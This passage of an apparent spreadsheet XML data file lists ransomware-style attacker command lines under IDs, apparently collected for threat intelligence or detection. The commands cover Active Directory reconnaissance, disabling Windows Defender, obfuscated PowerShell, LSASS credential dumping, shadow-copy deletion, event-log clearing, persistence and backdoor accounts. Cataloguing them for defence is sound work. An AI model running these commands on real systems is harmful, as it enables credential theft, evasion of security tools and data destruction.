    <m/>
    <s v="cmd.exe /c chcp &gt;&amp;2"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="procc-eid0604"/>
    <m/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=person)&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="procc-eid0605"/>
    <m/>
    <m/>
    <s v="adfind.exe -f &quot;objectcategory=computer&quot; "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="procc-eid0606"/>
    <m/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=organizationalUnit)&quot; "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="procc-eid0607"/>
    <m/>
    <m/>
    <s v="adfind.exe -gcb -sc trustdmp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="procc-eid0608"/>
    <m/>
    <m/>
    <s v="adfind.exe -subnets -f (objectCategory=subnet)"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="procc-eid0609"/>
    <m/>
    <m/>
    <s v="adfind.exe  -sc trustdmp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="procc-eid0610"/>
    <m/>
    <m/>
    <s v="Invoke-ShareFinder"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="procc-eid0611"/>
    <m/>
    <m/>
    <s v="cmd /c ping \\redacted\"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="procc-eid0612"/>
    <m/>
    <m/>
    <s v="conhost.exe 0xffffffff - ForceV1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="procc-eid0613"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C dir “\\&lt;REDACTED&gt;\C$” /s &gt;&gt; listback.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="procc-eid0614"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C dir “\\&lt;REDACTED&gt;\C$” /s &gt;&gt; list1.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="procc-eid0615"/>
    <m/>
    <m/>
    <s v="regsvr32.exe /s /n /i:&quot;-m -net -size 10 -nomutex -p \\host\C$&quot; x64.dll"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="procc-eid0616"/>
    <m/>
    <m/>
    <s v="rundll32.exe \\host\c$\ProgramData\c64.dll, StartA"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="procc-eid0617"/>
    <m/>
    <m/>
    <s v="c:\windows\system32\msiexec.exe /I C:\programdata\sql.msi"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="procc-eid0618"/>
    <m/>
    <m/>
    <s v="powershell Set-MpPreference -DisableRealtimeMonitoring $true"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="procc-eid0619"/>
    <m/>
    <m/>
    <s v="cmd /c dir &quot;\\host\c$&quot; /s&gt;&gt; listback.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="procc-eid0620"/>
    <m/>
    <m/>
    <s v="regsvr32.exe /s c:\users\&lt;uname&gt;\AppData\Local\Temp\Ewge.dll"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="procc-eid0621"/>
    <m/>
    <m/>
    <s v="&quot;msiexec.exe /V&quot;"/>
    <s v="&quot;AleterAgent.exe&quot; /u "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16"/>
  </r>
  <r>
    <s v="procc-eid0622"/>
    <m/>
    <m/>
    <s v="“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0623"/>
    <m/>
    <m/>
    <s v=" $windir\$system32\WindowsPowerShell\v1.0\powershell.exe -command “Set-MpPreference -EnableControlledFolderAccess Disabled”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0624"/>
    <m/>
    <m/>
    <s v="$windir\$system32\WindowsPowerShell\v1.0\powershell.exe Install-WindowsFeature -Name \”RSAT-ADPowerShell\” –IncludeAllSubFeature"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0625"/>
    <m/>
    <m/>
    <s v="$windir\$system32\WindowsPowerShell\v1.0\powershell.exe -command “$x = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(‘RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAg’+’AFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8AC’+’AARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkA’+’F8ALgBEAGUAbABlAHQAZQAoACkOwB9AA==’));Invoke-Expression $x”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0626"/>
    <m/>
    <m/>
    <s v=" powershell New-ItemProperty -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0627"/>
    <m/>
    <m/>
    <s v="powershell Set-MpPreference -DisableRealTimeMonitoring $true"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0628"/>
    <m/>
    <m/>
    <s v="powershell Uninstall-WindowsFeature -Name Windows-Defender"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0629"/>
    <m/>
    <m/>
    <s v="powershell Set-MpPreference -DisableIOAVProtection $true"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0630"/>
    <m/>
    <m/>
    <s v="powershell Set-MpPreference -DisableRealtimeMonitoring $true"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0631"/>
    <m/>
    <m/>
    <s v="“cmd /c del $windir\\$system32\\Taskmgr.exe /f /q &amp; del $windir\\$system32\\resmon.exe /f /q &amp; powershell -command \”$x = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(‘Vw’+’BpA’+’G4ARAB’+’lAGYA’+’ZQB’+’uAG’+’QA’));Stop-Service -Name $x;Set-Service -StartupType Disabled $x\””,"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0632"/>
    <m/>
    <m/>
    <s v="“powershell -command \”Import-Module ActiveDirectory; Get-ADComputer -Filter * -Properties * | FT Name\””"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0633"/>
    <m/>
    <m/>
    <s v="“powershell.exe -ExecutionPolicy Bypass -file \\[REMOTE _ HOSTNAME]\share$\p.ps1”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0634"/>
    <m/>
    <m/>
    <s v="schtasks /create /sc minute /mo 1 /tn Server /tr $user\$temp/Server.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0635"/>
    <m/>
    <m/>
    <s v="REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /V “Virtual Printer Driver&quot; /t REG _ SZ /F /D ”$user\$appdata\Macromedia\Temporary\WinPrint.exe”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0636"/>
    <m/>
    <m/>
    <s v="net user xxx [password] /add /active:yes /expires:never"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0637"/>
    <m/>
    <m/>
    <s v="net group “Enterprise admins” /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0638"/>
    <m/>
    <m/>
    <s v="net group “Domain admins” /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0639"/>
    <m/>
    <m/>
    <s v="Bitsadmin /transfer debjob /download \\[localuser]\C$\Windows\[Conti].dll C:\Windows\[conti].dll"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0640"/>
    <m/>
    <m/>
    <s v="bitsadmin /transfer xxx \\&lt;xxx&gt;\share$\xxx.exe %APPDATA%\xxx.exe &amp; %APPDATA%\xxx.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0641"/>
    <m/>
    <m/>
    <s v="reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG _ DWORD /d 1 /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0642"/>
    <m/>
    <m/>
    <s v="$windir\regedit.exe -single 1df11bc19aa52b623bdf15380e3fded56d8eb6fb7b53a2240779864b1a6474ad"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0643"/>
    <m/>
    <m/>
    <s v="netsh advfirewall firewall set rule group=”Remote Desktop” new enable=yes"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0644"/>
    <m/>
    <m/>
    <s v="netsh advfirewall firewall set rule File and Printer Sharing new enable=Yes "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0645"/>
    <m/>
    <m/>
    <s v="netsh firewall add allowedprogram “$user\$temp\svchos23.exe” “svchos23.exe” ENABLE"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0646"/>
    <m/>
    <m/>
    <s v="netsh firewall add allowedprogram “$user\$temp\cheats.exe” “cheats.exe” ENABLE"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0647"/>
    <m/>
    <m/>
    <s v="netsh firewall add allowedprogram “$user\$temp\IXP000.TMP\crypted.exe” “crypted.exe” ENABLE"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0648"/>
    <m/>
    <m/>
    <s v="taskill.exe /F /IM Raccine.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0649"/>
    <m/>
    <m/>
    <s v="taskill.exe /F /IM RaccineSettings.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0650"/>
    <m/>
    <m/>
    <s v="$windir\$system32\schtasks.exe /DELETE /TN “Raccine Rules Updater” /F "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0651"/>
    <m/>
    <m/>
    <s v="Get-WmiObject Win32 _ Shadowcopy |ForEach-Object {$ _ .Delete();}"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0652"/>
    <m/>
    <m/>
    <s v="reg.exe add “HKLM\System\CurrentControlSet\Services\SecurityHealthService” /v “Start” /t REG _ DWORD /d “4” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0653"/>
    <m/>
    <m/>
    <s v="reg.exe delete “HKLM\Software\Policies\Microsoft\Windows Defender” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0654"/>
    <m/>
    <m/>
    <s v="reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender” /v “DisableAntiSpyware” /t REG _ DWORD /d “1” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0655"/>
    <m/>
    <m/>
    <s v="reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender” /v “DisableAntiVirus” /t REG _ DWORD /d “1” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0656"/>
    <m/>
    <m/>
    <s v="reg.exe add HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine” /v “MpEnablePus” /t REG _ DWORD /d “0” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0657"/>
    <m/>
    <m/>
    <s v="reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableBehaviorMonitoring” /t REG _ DWORD /d “1” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0658"/>
    <m/>
    <m/>
    <s v="reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableIOAVProtection” /t REG _ DWORD /d “1” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0659"/>
    <m/>
    <m/>
    <s v="reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableOnAccessProtection” /t REG _ DWORD /d “1” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0660"/>
    <m/>
    <m/>
    <s v="reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableRealtimeMonitoring” /t REG _ DWORD /d “1” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0661"/>
    <m/>
    <m/>
    <s v="reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableScanOnRealtimeEnable” /t REG _ DWORD /d “1” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0662"/>
    <m/>
    <m/>
    <s v="reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Reporting” /v “DisableEnhancedNotifications” /t REG _ DWORD /d “1” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0663"/>
    <m/>
    <m/>
    <s v="reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet” /v “DisableBlockAtFirstSeen” /t REG _ DWORD /d “1” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0664"/>
    <m/>
    <m/>
    <s v="reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet” /v “SpynetReporting” /t REG _ DWORD /d “0” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0665"/>
    <m/>
    <m/>
    <s v="netsh advfirewall firewall set rule Network Discovery new enable=Yes"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0666"/>
    <m/>
    <m/>
    <s v="net localgroup administrators xxx /add"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0667"/>
    <m/>
    <m/>
    <s v="reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet” /v “SubmitSamplesConsent” /t REG _ DWORD /d “0” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0668"/>
    <m/>
    <m/>
    <s v="reg add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableRoutinelyTakingAction” /t REG _DWORD /d “1” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0669"/>
    <m/>
    <m/>
    <s v="reg.exe add “HKLM\System\CurrentControlSet\Services\WdBoot” /v “Start” /t REG _DWORD /d “4” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0670"/>
    <m/>
    <m/>
    <s v="reg.exe add “HKLM\System\CurrentControlSet\Services\WdFilter” /v “Start” /t REG _DWORD /d “4” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0671"/>
    <m/>
    <m/>
    <s v="reg.exe add “HKLM\System\CurrentControlSet\Services\WdNisDrv” /v “Start” /t REG _ DWORD /d “4” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0672"/>
    <m/>
    <m/>
    <s v="reg.exe add “HKLM\System\CurrentControlSet\Services\WdNisDrv” /v “Start” /t REG _ DWORD /d “4” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0673"/>
    <m/>
    <m/>
    <s v="reg.exe add “HKLM\System\CurrentControlSet\Services\WdNisSvc” /v “Start” /t REG _ DWORD /d “4” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0674"/>
    <m/>
    <m/>
    <s v="reg.exe add “HKLM\System\CurrentControlSet\Services\WinDefend” /v “Start” /t REG _ DWORD /d “4” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0675"/>
    <m/>
    <m/>
    <s v="reg.exe add “HKLM\System\CurrentControlSet\Services\SecurityHealthService” /v “Start” /t REG _ DWORD /d “4” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0676"/>
    <m/>
    <m/>
    <s v="reg.exe add “HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger” /v “Start” /t REG _ DWORD /d “0” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0677"/>
    <m/>
    <m/>
    <s v="reg.exe delete “HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run” /v “Windows Defender” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0678"/>
    <m/>
    <m/>
    <s v="reg.exe delete “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” /v “Windows Defender” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0679"/>
    <m/>
    <m/>
    <s v="reg.exe delete “HKCR\*\shellex\ContextMenuHandlers\EPP” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0680"/>
    <m/>
    <m/>
    <s v="reg.exe delete “HKCR\Directory\shellex\ContextMenuHandlers\EPP” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0681"/>
    <m/>
    <m/>
    <s v="reg.exe delete “HKCR\Drive\shellex\ContextMenuHandlers\EPP” /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0682"/>
    <m/>
    <m/>
    <s v="Set-MpPreference -DisableRealtimeMonitoring $true;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0683"/>
    <m/>
    <m/>
    <s v="Add-MpPreference -ExclusionExtension “.exe”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0684"/>
    <m/>
    <m/>
    <s v="dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0685"/>
    <m/>
    <m/>
    <s v="cmd.exe /c “$programfiles\Windows Defender\MpCmdRun.exe” -RemoveDefinitions -All"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0686"/>
    <m/>
    <m/>
    <s v="schtasks.exe /Change /TN “Microsoft\Windows\Windows Defender\Windows Defender Cleanup” /Disable"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0687"/>
    <m/>
    <m/>
    <s v="schtasks.exe /Change /TN “Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance” /Disable"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0688"/>
    <m/>
    <m/>
    <s v="REG ADD “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce” /V “Virtual Printer Driver” /t REG _ SZ /F /D $user\$appdata\Macromedia\Temporary\WinPrint.exe””"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0689"/>
    <m/>
    <m/>
    <s v="$windir\$system32\cmd.exe /k C:\Windows\inf\usbhub\explorer.exe -f C:\Windows\inf\usbhub\config.log"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0690"/>
    <m/>
    <m/>
    <s v="$windir\$system32\cmd.exe /c ping 1.1.1.1 -n 10 &gt; Nul &amp; Del $selfpath\$selfname.exe /F /Q"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0691"/>
    <m/>
    <m/>
    <s v="“$windir\$system32\cmd.exe” /C ping 127.0.0.7 -n 3 &gt; Nul &amp; fsutil file setZeroData offset=0 length=524288 “$selfpath\$selfname.exe” &amp; Del /f /q “$selfpath\$selfname.exe”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0692"/>
    <m/>
    <m/>
    <s v="wevtutil cl application"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0693"/>
    <m/>
    <m/>
    <s v="wevtutil cl security"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0694"/>
    <m/>
    <m/>
    <s v="wevtutil cl system"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0695"/>
    <m/>
    <m/>
    <s v="cmd.exe /C for /F \”tokens=*\” %1 in (‘wevutil.exe el’) DO wevutil.exe cl \”%1\”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0696"/>
    <m/>
    <m/>
    <s v="procdump.exe -accepteula -ma lsass.exe mem.dmp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0697"/>
    <m/>
    <m/>
    <s v="$windir\\$system32\\rundll32.exe $windir\\$system32\\comsvcs.dll, MiniDump &lt;lsass _ pid&gt; $windir\\$temp\\xxx full"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0698"/>
    <m/>
    <m/>
    <s v="net session"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0699"/>
    <m/>
    <m/>
    <s v="net use"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0700"/>
    <m/>
    <m/>
    <s v="netstat -ano"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0701"/>
    <m/>
    <m/>
    <s v="query session”"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0702"/>
    <m/>
    <m/>
    <s v="net view"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0703"/>
    <m/>
    <m/>
    <s v="net view /all"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0704"/>
    <m/>
    <m/>
    <s v="net view /all /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0705"/>
    <m/>
    <m/>
    <s v="dsquery subnet -limit 0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="procc-eid0706"/>
    <m/>
    <m/>
    <s v="nltest /domain _ trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
